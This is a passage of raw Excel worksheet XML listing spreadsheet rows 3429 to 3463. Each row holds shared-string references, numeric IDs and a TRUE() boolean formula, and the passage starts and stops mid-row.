      </c>
      <c r="E3429" t="s">
        <v>4037</v>
      </c>
      <c r="F3429">
        <v>22539839</v>
      </c>
      <c r="G3429" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3429" t="s">
        <v>4119</v>
      </c>
      <c r="K3429">
        <v>0</v>
      </c>
      <c r="L3429" t="s">
        <v>4089</v>
      </c>
      <c r="R3429" t="s">
        <v>5</v>
      </c>
      <c r="S3429" t="s">
        <v>4040</v>
      </c>
      <c r="T3429" t="s">
        <v>7</v>
      </c>
      <c r="U3429" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3430" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3430" s="1">
        <v>19798</v>
      </c>
      <c r="B3430" t="s">
        <v>10</v>
      </c>
      <c r="C3430" t="s">
        <v>11</v>
      </c>
      <c r="D3430" t="s">
        <v>4098</v>
      </c>
      <c r="E3430" t="s">
        <v>4037</v>
      </c>
      <c r="F3430">
        <v>22539839</v>
      </c>
      <c r="G3430" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3430" t="s">
        <v>4120</v>
      </c>
      <c r="K3430">
        <v>0</v>
      </c>
      <c r="L3430" t="s">
        <v>4089</v>
      </c>
      <c r="R3430" t="s">
        <v>5</v>
      </c>
      <c r="S3430" t="s">
        <v>4040</v>
      </c>
      <c r="T3430" t="s">
        <v>7</v>
      </c>
      <c r="U3430" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3431" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3431" s="1">
        <v>19799</v>
      </c>
      <c r="B3431" t="s">
        <v>10</v>
      </c>
      <c r="C3431" t="s">
        <v>11</v>
      </c>
      <c r="D3431" t="s">
        <v>4098</v>
      </c>
      <c r="E3431" t="s">
        <v>4037</v>
      </c>
      <c r="F3431">
        <v>22539839</v>
      </c>
      <c r="G3431" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3431" t="s">
        <v>4121</v>
      </c>
      <c r="K3431">
        <v>0</v>
      </c>
      <c r="L3431" t="s">
        <v>4089</v>
      </c>
      <c r="R3431" t="s">
        <v>5</v>
      </c>
      <c r="S3431" t="s">
        <v>4040</v>
      </c>
      <c r="T3431" t="s">
        <v>7</v>
      </c>
      <c r="U3431" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3432" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3432" s="1">
        <v>19800</v>
      </c>
      <c r="B3432" t="s">
        <v>10</v>
      </c>
      <c r="C3432" t="s">
        <v>11</v>
      </c>
      <c r="D3432" t="s">
        <v>4098</v>
      </c>
      <c r="E3432" t="s">
        <v>4037</v>
      </c>
      <c r="F3432">
        <v>22539839</v>
      </c>
      <c r="G3432" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3432" t="s">
        <v>4122</v>
      </c>
      <c r="K3432">
        <v>0</v>
      </c>
      <c r="L3432" t="s">
        <v>4089</v>
      </c>
      <c r="R3432" t="s">
        <v>5</v>
      </c>
      <c r="S3432" t="s">
        <v>4040</v>
      </c>
      <c r="T3432" t="s">
        <v>7</v>
      </c>
      <c r="U3432" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3433" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3433" s="1">
        <v>19801</v>
      </c>
      <c r="B3433" t="s">
        <v>10</v>
      </c>
      <c r="C3433" t="s">
        <v>11</v>
      </c>
      <c r="D3433" t="s">
        <v>4098</v>
      </c>
      <c r="E3433" t="s">
        <v>4037</v>
      </c>
      <c r="F3433">
        <v>22539839</v>
      </c>
      <c r="G3433" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3433" t="s">
        <v>4123</v>
      </c>
      <c r="K3433">
        <v>0</v>
      </c>
      <c r="L3433" t="s">
        <v>4089</v>
      </c>
      <c r="R3433" t="s">
        <v>5</v>
      </c>
      <c r="S3433" t="s">
        <v>4040</v>
      </c>
      <c r="T3433" t="s">
        <v>7</v>
      </c>
      <c r="U3433" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3434" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3434" s="1">
        <v>19802</v>
      </c>
      <c r="B3434" t="s">
        <v>10</v>
      </c>
      <c r="C3434" t="s">
        <v>11</v>
      </c>
      <c r="D3434" t="s">
        <v>4098</v>
      </c>
      <c r="E3434" t="s">
        <v>4037</v>
      </c>
      <c r="F3434">
        <v>22539839</v>
      </c>
      <c r="G3434" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3434" t="s">
        <v>4124</v>
      </c>
      <c r="K3434">
        <v>0</v>
      </c>
      <c r="L3434" t="s">
        <v>4089</v>
      </c>
      <c r="R3434" t="s">
        <v>5</v>
      </c>
      <c r="S3434" t="s">
        <v>4040</v>
      </c>
      <c r="T3434" t="s">
        <v>7</v>
      </c>
      <c r="U3434" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3435" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3435" s="1">
        <v>19803</v>
      </c>
      <c r="B3435" t="s">
        <v>10</v>
      </c>
      <c r="C3435" t="s">
        <v>11</v>
      </c>
      <c r="D3435" t="s">
        <v>4098</v>
      </c>
      <c r="E3435" t="s">
        <v>4037</v>
      </c>
      <c r="F3435">
        <v>22539839</v>
      </c>
      <c r="G3435" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3435" t="s">
        <v>4125</v>
      </c>
      <c r="K3435">
        <v>0</v>
      </c>
      <c r="L3435" t="s">
        <v>4089</v>
      </c>
      <c r="R3435" t="s">
        <v>5</v>
      </c>
      <c r="S3435" t="s">
        <v>4040</v>
      </c>
      <c r="T3435" t="s">
        <v>7</v>
      </c>
      <c r="U3435" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3436" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3436" s="1">
        <v>19804</v>
      </c>
      <c r="B3436" t="s">
        <v>10</v>
      </c>
      <c r="C3436" t="s">
        <v>11</v>
      </c>
      <c r="D3436" t="s">
        <v>4098</v>
      </c>
      <c r="E3436" t="s">
        <v>4037</v>
      </c>
      <c r="F3436">
        <v>22539839</v>
      </c>
      <c r="G3436" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3436" t="s">
        <v>4126</v>
      </c>
      <c r="K3436">
        <v>0</v>
      </c>
      <c r="L3436" t="s">
        <v>4089</v>
      </c>
      <c r="R3436" t="s">
        <v>5</v>
      </c>
      <c r="S3436" t="s">
        <v>4040</v>
      </c>
      <c r="T3436" t="s">
        <v>7</v>
      </c>
      <c r="U3436" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3437" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3437" s="1">
        <v>19805</v>
      </c>
      <c r="B3437" t="s">
        <v>10</v>
      </c>
      <c r="C3437" t="s">
        <v>11</v>
      </c>
      <c r="D3437" t="s">
        <v>4098</v>
      </c>
      <c r="E3437" t="s">
        <v>4037</v>
      </c>
      <c r="F3437">
        <v>22539839</v>
      </c>
      <c r="G3437" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3437" t="s">
        <v>4127</v>
      </c>
      <c r="K3437">
        <v>0</v>
      </c>
      <c r="L3437" t="s">
        <v>4089</v>
      </c>
      <c r="R3437" t="s">
        <v>5</v>
      </c>
      <c r="S3437" t="s">
        <v>4040</v>
      </c>
      <c r="T3437" t="s">
        <v>7</v>
      </c>
      <c r="U3437" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3438" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3438" s="1">
        <v>19806</v>
      </c>
      <c r="B3438" t="s">
        <v>10</v>
      </c>
      <c r="C3438" t="s">
        <v>11</v>
      </c>
      <c r="D3438" t="s">
        <v>4098</v>
      </c>
      <c r="E3438" t="s">
        <v>4037</v>
      </c>
      <c r="F3438">
        <v>22539839</v>
      </c>
      <c r="G3438" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3438" t="s">
        <v>4128</v>
      </c>
      <c r="K3438">
        <v>0</v>
      </c>
      <c r="L3438" t="s">
        <v>4089</v>
      </c>
      <c r="R3438" t="s">
        <v>5</v>
      </c>
      <c r="S3438" t="s">
        <v>4040</v>
      </c>
      <c r="T3438" t="s">
        <v>7</v>
      </c>
      <c r="U3438" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3439" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3439" s="1">
        <v>19807</v>
      </c>
      <c r="B3439" t="s">
        <v>10</v>
      </c>
      <c r="C3439" t="s">
        <v>11</v>
      </c>
      <c r="D3439" t="s">
        <v>4098</v>
      </c>
      <c r="E3439" t="s">
        <v>4037</v>
      </c>
      <c r="F3439">
        <v>22539839</v>
      </c>
      <c r="G3439" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3439" t="s">
        <v>4129</v>
      </c>
      <c r="K3439">
        <v>0</v>
      </c>
      <c r="L3439" t="s">
        <v>4089</v>
      </c>
      <c r="R3439" t="s">
        <v>5</v>
      </c>
      <c r="S3439" t="s">
        <v>4040</v>
      </c>
      <c r="T3439" t="s">
        <v>7</v>
      </c>
      <c r="U3439" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3440" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3440" s="1">
        <v>19808</v>
      </c>
      <c r="B3440" t="s">
        <v>10</v>
      </c>
      <c r="C3440" t="s">
        <v>11</v>
      </c>
      <c r="D3440" t="s">
        <v>4098</v>
      </c>
      <c r="E3440" t="s">
        <v>4037</v>
      </c>
      <c r="F3440">
        <v>22539839</v>
      </c>
      <c r="G3440" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3440" t="s">
        <v>4130</v>
      </c>
      <c r="K3440">
        <v>0</v>
      </c>
      <c r="L3440" t="s">
        <v>4089</v>
      </c>
      <c r="R3440" t="s">
        <v>5</v>
      </c>
      <c r="S3440" t="s">
        <v>4040</v>
      </c>
      <c r="T3440" t="s">
        <v>7</v>
      </c>
      <c r="U3440" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3441" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3441" s="1">
        <v>19809</v>
      </c>
      <c r="B3441" t="s">
        <v>10</v>
      </c>
      <c r="C3441" t="s">
        <v>11</v>
      </c>
      <c r="D3441" t="s">
        <v>4098</v>
      </c>
      <c r="E3441" t="s">
        <v>4037</v>
      </c>
      <c r="F3441">
        <v>22539839</v>
      </c>
      <c r="G3441" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3441" t="s">
        <v>4131</v>
      </c>
      <c r="K3441">
        <v>0</v>
      </c>
      <c r="L3441" t="s">
        <v>4089</v>
      </c>
      <c r="R3441" t="s">
        <v>5</v>
      </c>
      <c r="S3441" t="s">
        <v>4040</v>
      </c>
      <c r="T3441" t="s">
        <v>7</v>
      </c>
      <c r="U3441" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3442" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3442" s="1">
        <v>19810</v>
      </c>
      <c r="B3442" t="s">
        <v>10</v>
      </c>
      <c r="C3442" t="s">
        <v>11</v>
      </c>
      <c r="D3442" t="s">
        <v>4098</v>
      </c>
      <c r="E3442" t="s">
        <v>4037</v>
      </c>
      <c r="F3442">
        <v>22539839</v>
      </c>
      <c r="G3442" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3442" t="s">
        <v>4132</v>
      </c>
      <c r="K3442">
        <v>0</v>
      </c>
      <c r="L3442" t="s">
        <v>4089</v>
      </c>
      <c r="R3442" t="s">
        <v>5</v>
      </c>
      <c r="S3442" t="s">
        <v>4040</v>
      </c>
      <c r="T3442" t="s">
        <v>7</v>
      </c>
      <c r="U3442" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3443" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3443" s="1">
        <v>19811</v>
      </c>
      <c r="B3443" t="s">
        <v>10</v>
      </c>
      <c r="C3443" t="s">
        <v>11</v>
      </c>
      <c r="D3443" t="s">
        <v>4098</v>
      </c>
      <c r="E3443" t="s">
        <v>4037</v>
      </c>
      <c r="F3443">
        <v>22539839</v>
      </c>
      <c r="G3443" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3443" t="s">
        <v>4133</v>
      </c>
      <c r="K3443">
        <v>0</v>
      </c>
      <c r="L3443" t="s">
        <v>4089</v>
      </c>
      <c r="R3443" t="s">
        <v>5</v>
      </c>
      <c r="S3443" t="s">
        <v>4040</v>
      </c>
      <c r="T3443" t="s">
        <v>7</v>
      </c>
      <c r="U3443" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3444" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3444" s="1">
        <v>19812</v>
      </c>
      <c r="B3444" t="s">
        <v>10</v>
      </c>
      <c r="C3444" t="s">
        <v>11</v>
      </c>
      <c r="D3444" t="s">
        <v>4098</v>
      </c>
      <c r="E3444" t="s">
        <v>4037</v>
      </c>
      <c r="F3444">
        <v>22539839</v>
      </c>
      <c r="G3444" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3444" t="s">
        <v>4134</v>
      </c>
      <c r="K3444">
        <v>0</v>
      </c>
      <c r="L3444" t="s">
        <v>4089</v>
      </c>
      <c r="R3444" t="s">
        <v>5</v>
      </c>
      <c r="S3444" t="s">
        <v>4040</v>
      </c>
      <c r="T3444" t="s">
        <v>7</v>
      </c>
      <c r="U3444" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3445" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3445" s="1">
        <v>19813</v>
      </c>
      <c r="B3445" t="s">
        <v>10</v>
      </c>
      <c r="C3445" t="s">
        <v>11</v>
      </c>
      <c r="D3445" t="s">
        <v>4098</v>
      </c>
      <c r="E3445" t="s">
        <v>4037</v>
      </c>
      <c r="F3445">
        <v>22539839</v>
      </c>
      <c r="G3445" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3445" t="s">
        <v>4135</v>
      </c>
      <c r="K3445">
        <v>0</v>
      </c>
      <c r="L3445" t="s">
        <v>4089</v>
      </c>
      <c r="R3445" t="s">
        <v>5</v>
      </c>
      <c r="S3445" t="s">
        <v>4040</v>
      </c>
      <c r="T3445" t="s">
        <v>7</v>
      </c>
      <c r="U3445" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3446" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3446" s="1">
        <v>19814</v>
      </c>
      <c r="B3446" t="s">
        <v>10</v>
      </c>
      <c r="C3446" t="s">
        <v>11</v>
      </c>
      <c r="D3446" t="s">
        <v>4098</v>
      </c>
      <c r="E3446" t="s">
        <v>4037</v>
      </c>
      <c r="F3446">
        <v>22539839</v>
      </c>
      <c r="G3446" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3446" t="s">
        <v>4136</v>
      </c>
      <c r="K3446">
        <v>0</v>
      </c>
      <c r="L3446" t="s">
        <v>4089</v>
      </c>
      <c r="R3446" t="s">
        <v>5</v>
      </c>
      <c r="S3446" t="s">
        <v>4040</v>
      </c>
      <c r="T3446" t="s">
        <v>7</v>
      </c>
      <c r="U3446" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3447" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3447" s="1">
        <v>19815</v>
      </c>
      <c r="B3447" t="s">
        <v>10</v>
      </c>
      <c r="C3447" t="s">
        <v>11</v>
      </c>
      <c r="D3447" t="s">
        <v>4098</v>
      </c>
      <c r="E3447" t="s">
        <v>4037</v>
      </c>
      <c r="F3447">
        <v>22539839</v>
      </c>
      <c r="G3447" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3447" t="s">
        <v>4137</v>
      </c>
      <c r="K3447">
        <v>0</v>
      </c>
      <c r="L3447" t="s">
        <v>4089</v>
      </c>
      <c r="R3447" t="s">
        <v>5</v>
      </c>
      <c r="S3447" t="s">
        <v>4040</v>
      </c>
      <c r="T3447" t="s">
        <v>7</v>
      </c>
      <c r="U3447" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3448" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3448" s="1">
        <v>19816</v>
      </c>
      <c r="B3448" t="s">
        <v>10</v>
      </c>
      <c r="C3448" t="s">
        <v>11</v>
      </c>
      <c r="D3448" t="s">
        <v>4098</v>
      </c>
      <c r="E3448" t="s">
        <v>4037</v>
      </c>
      <c r="F3448">
        <v>22539839</v>
      </c>
      <c r="G3448" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3448" t="s">
        <v>4138</v>
      </c>
      <c r="K3448">
        <v>0</v>
      </c>
      <c r="L3448" t="s">
        <v>4089</v>
      </c>
      <c r="R3448" t="s">
        <v>5</v>
      </c>
      <c r="S3448" t="s">
        <v>4040</v>
      </c>
      <c r="T3448" t="s">
        <v>7</v>
      </c>
      <c r="U3448" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3449" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3449" s="1">
        <v>19817</v>
      </c>
      <c r="B3449" t="s">
        <v>10</v>
      </c>
      <c r="C3449" t="s">
        <v>11</v>
      </c>
      <c r="D3449" t="s">
        <v>4098</v>
      </c>
      <c r="E3449" t="s">
        <v>4037</v>
      </c>
      <c r="F3449">
        <v>22539839</v>
      </c>
      <c r="G3449" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3449" t="s">
        <v>4139</v>
      </c>
      <c r="K3449">
        <v>0</v>
      </c>
      <c r="L3449" t="s">
        <v>4089</v>
      </c>
      <c r="R3449" t="s">
        <v>5</v>
      </c>
      <c r="S3449" t="s">
        <v>4040</v>
      </c>
      <c r="T3449" t="s">
        <v>7</v>
      </c>
      <c r="U3449" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3450" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3450" s="1">
        <v>19818</v>
      </c>
      <c r="B3450" t="s">
        <v>10</v>
      </c>
      <c r="C3450" t="s">
        <v>11</v>
      </c>
      <c r="D3450" t="s">
        <v>4098</v>
      </c>
      <c r="E3450" t="s">
        <v>4037</v>
      </c>
      <c r="F3450">
        <v>22539839</v>
      </c>
      <c r="G3450" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3450" t="s">
        <v>4140</v>
      </c>
      <c r="K3450">
        <v>0</v>
      </c>
      <c r="L3450" t="s">
        <v>4089</v>
      </c>
      <c r="R3450" t="s">
        <v>5</v>
      </c>
      <c r="S3450" t="s">
        <v>4040</v>
      </c>
      <c r="T3450" t="s">
        <v>7</v>
      </c>
      <c r="U3450" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3451" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3451" s="1">
        <v>19819</v>
      </c>
      <c r="B3451" t="s">
        <v>10</v>
      </c>
      <c r="C3451" t="s">
        <v>11</v>
      </c>
      <c r="D3451" t="s">
        <v>4098</v>
      </c>
      <c r="E3451" t="s">
        <v>4037</v>
      </c>
      <c r="F3451">
        <v>22539839</v>
      </c>
      <c r="G3451" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3451" t="s">
        <v>4141</v>
      </c>
      <c r="K3451">
        <v>0</v>
      </c>
      <c r="L3451" t="s">
        <v>4089</v>
      </c>
      <c r="R3451" t="s">
        <v>5</v>
      </c>
      <c r="S3451" t="s">
        <v>4040</v>
      </c>
      <c r="T3451" t="s">
        <v>7</v>
      </c>
      <c r="U3451" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3452" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3452" s="1">
        <v>19820</v>
      </c>
      <c r="B3452" t="s">
        <v>10</v>
      </c>
      <c r="C3452" t="s">
        <v>11</v>
      </c>
      <c r="D3452" t="s">
        <v>4098</v>
      </c>
      <c r="E3452" t="s">
        <v>4037</v>
      </c>
      <c r="F3452">
        <v>22539839</v>
      </c>
      <c r="G3452" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3452" t="s">
        <v>4142</v>
      </c>
      <c r="K3452">
        <v>0</v>
      </c>
      <c r="L3452" t="s">
        <v>4089</v>
      </c>
      <c r="R3452" t="s">
        <v>5</v>
      </c>
      <c r="S3452" t="s">
        <v>4040</v>
      </c>
      <c r="T3452" t="s">
        <v>7</v>
      </c>
      <c r="U3452" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3453" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3453" s="1">
        <v>19821</v>
      </c>
      <c r="B3453" t="s">
        <v>10</v>
      </c>
      <c r="C3453" t="s">
        <v>11</v>
      </c>
      <c r="D3453" t="s">
        <v>4098</v>
      </c>
      <c r="E3453" t="s">
        <v>4037</v>
      </c>
      <c r="F3453">
        <v>22539839</v>
      </c>
      <c r="G3453" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3453" t="s">
        <v>4143</v>
      </c>
      <c r="K3453">
        <v>0</v>
      </c>
      <c r="L3453" t="s">
        <v>4089</v>
      </c>
      <c r="R3453" t="s">
        <v>5</v>
      </c>
      <c r="S3453" t="s">
        <v>4040</v>
      </c>
      <c r="T3453" t="s">
        <v>7</v>
      </c>
      <c r="U3453" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3454" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3454" s="1">
        <v>19822</v>
      </c>
      <c r="B3454" t="s">
        <v>10</v>
      </c>
      <c r="C3454" t="s">
        <v>11</v>
      </c>
      <c r="D3454" t="s">
        <v>4098</v>
      </c>
      <c r="E3454" t="s">
        <v>4037</v>
      </c>
      <c r="F3454">
        <v>22539839</v>
      </c>
      <c r="G3454" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3454" t="s">
        <v>4144</v>
      </c>
      <c r="K3454">
        <v>0</v>
      </c>
      <c r="L3454" t="s">
        <v>4089</v>
      </c>
      <c r="R3454" t="s">
        <v>5</v>
      </c>
      <c r="S3454" t="s">
        <v>4040</v>
      </c>
      <c r="T3454" t="s">
        <v>7</v>
      </c>
      <c r="U3454" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3455" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3455" s="1">
        <v>19823</v>
      </c>
      <c r="B3455" t="s">
        <v>10</v>
      </c>
      <c r="C3455" t="s">
        <v>11</v>
      </c>
      <c r="D3455" t="s">
        <v>4098</v>
      </c>
      <c r="E3455" t="s">
        <v>4037</v>
      </c>
      <c r="F3455">
        <v>22539839</v>
      </c>
      <c r="G3455" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3455" t="s">
        <v>4145</v>
      </c>
      <c r="K3455">
        <v>0</v>
      </c>
      <c r="L3455" t="s">
        <v>4089</v>
      </c>
      <c r="R3455" t="s">
        <v>5</v>
      </c>
      <c r="S3455" t="s">
        <v>4040</v>
      </c>
      <c r="T3455" t="s">
        <v>7</v>
      </c>
      <c r="U3455" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3456" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3456" s="1">
        <v>19824</v>
      </c>
      <c r="B3456" t="s">
        <v>10</v>
      </c>
      <c r="C3456" t="s">
        <v>11</v>
      </c>
      <c r="D3456" t="s">
        <v>4098</v>
      </c>
      <c r="E3456" t="s">
        <v>4037</v>
      </c>
      <c r="F3456">
        <v>22539839</v>
      </c>
      <c r="G3456" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3456" t="s">
        <v>4146</v>
      </c>
      <c r="K3456">
        <v>0</v>
      </c>
      <c r="L3456" t="s">
        <v>4089</v>
      </c>
      <c r="R3456" t="s">
        <v>5</v>
      </c>
      <c r="S3456" t="s">
        <v>4040</v>
      </c>
      <c r="T3456" t="s">
        <v>7</v>
      </c>
      <c r="U3456" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3457" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3457" s="1">
        <v>19825</v>
      </c>
      <c r="B3457" t="s">
        <v>10</v>
      </c>
      <c r="C3457" t="s">
        <v>11</v>
      </c>
      <c r="D3457" t="s">
        <v>4098</v>
      </c>
      <c r="E3457" t="s">
        <v>4037</v>
      </c>
      <c r="F3457">
        <v>22539839</v>
      </c>
      <c r="G3457" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3457" t="s">
        <v>4147</v>
      </c>
      <c r="K3457">
        <v>0</v>
      </c>
      <c r="L3457" t="s">
        <v>4089</v>
      </c>
      <c r="R3457" t="s">
        <v>5</v>
      </c>
      <c r="S3457" t="s">
        <v>4040</v>
      </c>
      <c r="T3457" t="s">
        <v>7</v>
      </c>
      <c r="U3457" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3458" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3458" s="1">
        <v>19826</v>
      </c>
      <c r="B3458" t="s">
        <v>10</v>
      </c>
      <c r="C3458" t="s">
        <v>11</v>
      </c>
      <c r="D3458" t="s">
        <v>4098</v>
      </c>
      <c r="E3458" t="s">
        <v>4037</v>
      </c>
      <c r="F3458">
        <v>22539839</v>
      </c>
      <c r="G3458" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3458" t="s">
        <v>4148</v>
      </c>
      <c r="K3458">
        <v>0</v>
      </c>
      <c r="L3458" t="s">
        <v>4089</v>
      </c>
      <c r="R3458" t="s">
        <v>5</v>
      </c>
      <c r="S3458" t="s">
        <v>4040</v>
      </c>
      <c r="T3458" t="s">
        <v>7</v>
      </c>
      <c r="U3458" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3459" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3459" s="1">
        <v>19827</v>
      </c>
      <c r="B3459" t="s">
        <v>10</v>
      </c>
      <c r="C3459" t="s">
        <v>11</v>
      </c>
      <c r="D3459" t="s">
        <v>4098</v>
      </c>
      <c r="E3459" t="s">
        <v>4037</v>
      </c>
      <c r="F3459">
        <v>22539839</v>
      </c>
      <c r="G3459" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3459" t="s">
        <v>4149</v>
      </c>
      <c r="K3459">
        <v>0</v>
      </c>
      <c r="L3459" t="s">
        <v>4089</v>
      </c>
      <c r="R3459" t="s">
        <v>5</v>
      </c>
      <c r="S3459" t="s">
        <v>4040</v>
      </c>
      <c r="T3459" t="s">
        <v>7</v>
      </c>
      <c r="U3459" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3460" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3460" s="1">
        <v>19828</v>
      </c>
      <c r="B3460" t="s">
        <v>10</v>
      </c>
      <c r="C3460" t="s">
        <v>11</v>
      </c>
      <c r="D3460" t="s">
        <v>4098</v>
      </c>
      <c r="E3460" t="s">
        <v>4037</v>
      </c>
      <c r="F3460">
        <v>22539839</v>
      </c>
      <c r="G3460" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3460" t="s">
        <v>4150</v>
      </c>
      <c r="K3460">
        <v>0</v>
      </c>
      <c r="L3460" t="s">
        <v>4089</v>
      </c>
      <c r="R3460" t="s">
        <v>5</v>
      </c>
      <c r="S3460" t="s">
        <v>4040</v>
      </c>
      <c r="T3460" t="s">
        <v>7</v>
      </c>
      <c r="U3460" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3461" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3461" s="1">
        <v>19829</v>
      </c>
      <c r="B3461" t="s">
        <v>10</v>
      </c>
      <c r="C3461" t="s">
        <v>11</v>
      </c>
      <c r="D3461" t="s">
        <v>4098</v>
      </c>
      <c r="E3461" t="s">
        <v>4037</v>
      </c>
      <c r="F3461">
        <v>22539839</v>
      </c>
      <c r="G3461" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3461" t="s">
        <v>4151</v>
      </c>
      <c r="K3461">
        <v>0</v>
      </c>
      <c r="L3461" t="s">
        <v>4089</v>
      </c>
      <c r="R3461" t="s">
        <v>5</v>
      </c>
      <c r="S3461" t="s">
        <v>4040</v>
      </c>
      <c r="T3461" t="s">
        <v>7</v>
      </c>
      <c r="U3461" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3462" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3462" s="1">
        <v>19830</v>
      </c>
      <c r="B3462" t="s">
        <v>10</v>
      </c>
      <c r="C3462" t="s">
        <v>11</v>
      </c>
      <c r="D3462" t="s">
        <v>4098</v>
      </c>
      <c r="E3462" t="s">
        <v>4037</v>
      </c>
      <c r="F3462">
        <v>22539839</v>
      </c>
      <c r="G3462" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3462" t="s">
        <v>4152</v>
      </c>
      <c r="K3462">
        <v>0</v>
      </c>
      <c r="L3462" t="s">
        <v>4089</v>
      </c>
      <c r="R3462" t="s">
        <v>5</v>
      </c>
      <c r="S3462" t="s">
        <v>4040</v>
      </c>
      <c r="T3462" t="s">
        <v>7</v>
      </c>
      <c r="U3462" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3463" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3463" s="1">
        <v>19831</v>
      </c>
      <c r="B3463" t="s">
        <v>10</v>
      </c>
      <c r="C3463" t="s">
        <v>11</v>
